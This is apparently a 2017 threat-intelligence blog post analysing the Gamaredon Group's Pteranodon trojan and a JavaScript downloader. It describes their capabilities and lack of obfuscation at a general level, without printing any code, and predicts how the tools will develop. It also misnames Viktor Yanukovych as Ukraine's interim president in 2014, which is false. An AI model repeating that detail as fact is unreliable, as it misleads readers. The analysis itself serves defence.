The Gamaredon Group, a presumed Russian hacking unit known for attacking state targets in Ukraine, is in the midst of a shift from relying primarily on commercial malware and attack tools to developing their own, custom-built toolset. Our analysis of Gamaredon’s Pteranodon trojan and one of its JavaScript downloaders revealed that the group is deploying plain-text, unobfuscated code to download additional malware, take screenshots, and execute commands. Thus, while the group is certainly demonstrating a tactical evolution by switching from off-the-shelf to custom tools, a reality first highlighted by Palo Alto Networks, Gamaredon Group’s failure to obscure its code suggests that the group still lacks a level of sophistication in programming.
The Gamaredon Group, which is thought to be responsible for a prior attack campaign called “Operation Armegeddon,” targets Ukranian government, law enforcement, and military officials with the goal of stealing information to be leveraged by the Russian military. This group has been active since at least 2013, according to researchers at Looking Glass, and its cyber-attack profile increased in mid-April 2014 in response to statements made against pro-Russian separatists by then-interim Ukrainian president Viktor Yanukovych.
The Gamaredon Group typically delivers its malware via malicious attachments, including SFX archives and JavaScript downloaders. Some malicious emails also include decoy documents referencing casualties in Russian-Ukranian conflicts.
Technical analysis
We analyzed two files from the Palo Alto Unit 42 report on custom Gamaredon Group malware. The first of these files, a JavaScript downloader, is depicted in Figure 1 below:
Figure 1: A JavaScript downloader used by the Gamaredon Group
While the logic behind this code is sound, the code contains no obfuscation, making detection by security devices relatively easy. In contrast, more sophisticated droppers use garbage code, variable concatenation, and other techniques to deter analysis and detection (as demonstrated in the below video).
.
This lack of obfuscation is also represented in the Pteranodon malware. This sample we analyzed contains a hardcoded command-and-control (C2) server in the strings, as well as hardcoded command lists. The malware supports command-line execution, file download and execution, and screenshotting. An example of one of the command-line execution workflows is depicted in Figure 2, with red boxes highlighting the workflow and unobfuscated strings. As with the JavaScript downloader, the lack of obfuscation around these values suggests a lack of sophistication by the developers.
Figure 2: The programming workflow for arbitrary command-line execution in the Pteranodon malware
Because the malware has a limited number of features, we believe that it may be in continued development. Previous tools used by the group, according to Palo Alto Networks, include VNC and Remote Manipulator System, two applications that can be used for monitoring and remote administration. Given that the custom Pteranodon trojan used in new Gamaredon campaigns is only capable of three primary functions (screenshot capture, command line execution, and file downloading), Cyber4Sight assesses that future versions of this trojan may include features that closely align with those offered by VNC and Remote Manipulator System.
Moving forward
Cyber4Sight expects the following future developments to the malware used by Gamaredon Group as it becomes more advanced:
- Implementation of packing and obfuscation techniques in the droppers and payloads
- Streamlined delivery and installation procedures
- Implementation of additional features to mirror the functionality of third-party tools, including keylogging and video capture
Image via Daniel Haußmann licensed under Creative Commons
Article Link: https://blog.cyber4sight.com/2017/03/gamaredon-group-developing-custom-malware-failing-to-obfuscated-commands/